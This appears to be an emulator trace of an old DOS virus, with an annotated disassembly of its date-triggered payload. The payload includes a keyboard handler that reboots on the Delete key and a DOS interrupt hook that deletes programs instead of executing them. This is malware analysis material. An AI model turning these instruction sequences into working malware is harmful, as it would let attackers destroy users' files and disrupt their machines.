2018-12-25T12:35:59.431376933Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.434215693Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.44303755Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.455314253Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.458329196Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
; Disassembly window from the date-triggered payload. Its first instruction (0x12b1f: cmp dl, 1) is printed on the preceding log line,
; directly after "Get date", so DL is presumably the day of month returned by that call.
; In this run the next logged event is "Set disk transfer address" at PC 12b96, with no display-string or set-vector events after the date check.
; Linear disassembly: 0x12b30-0x12b4c sit between the jmp at 0x12b2e and its target and look like resident handler bodies, not fall-through code.
0x12b22: je 0x12b26  ; day value == 1 -> run the payload setup
0x12b24: jmp 0x12b8d  ; otherwise skip it
0x12b26: mov ah, 9  ; AH=09h display '$'-terminated string
0x12b28: lea dx, word ptr [bp + 0x2a9]  ; DX -> message at bp+0x2a9
0x12b2c: int 0x21  ; display-string call
0x12b2e: jmp 0x12b5a  ; jump over the bytes below to 0x12b5a
0x12b30: push ax  ; presumably the entry of a keyboard-interrupt handler — confirm against the install code, which is outside this window
0x12b31: in al, 0x60  ; read the scancode from keyboard data port 0x60
0x12b33: cmp al, 0x53  ; 0x53 is the make code of the Delete / keypad '.' key
0x12b35: je 0x12b3d  ; that key -> reset path
0x12b37: pop ax  ; any other key: restore AX
0x12b38: ljmp ptr cs:[0x2cd]  ; chain through the far pointer stored at cs:0x2cd (presumably the saved original handler — confirm)
0x12b3d: ljmp 0xffff:0  ; far jump to FFFF:0000, the PC reset entry point, i.e. the machine restarts
0x12b42: iret  ; not reached by fall-through after the far jump; role not visible in this window
0x12b43: cmp ax, 0x4b00  ; presumably the entry of an INT 21h hook: is this a DOS EXEC (load and execute) request?
0x12b46: jne 0x12b4c  ; no -> continue with the next check
0x12b48: mov ah, 0x41  ; rewrite the request to AH=41h delete file; DS:DX is left unchanged, so it still points at the program path passed to EXEC
0x12b4a: int 0x21  ; issue the delete: the program being launched is removed instead of executed
0x12b4c: cmp ax, 0x4b9f  ; compares AX with a non-standard value; the window ends here, possibly a residency self-check — confirm
2018-12-25T12:35:59.461040839Z 26 PC: 12b96 | Set disk transfer address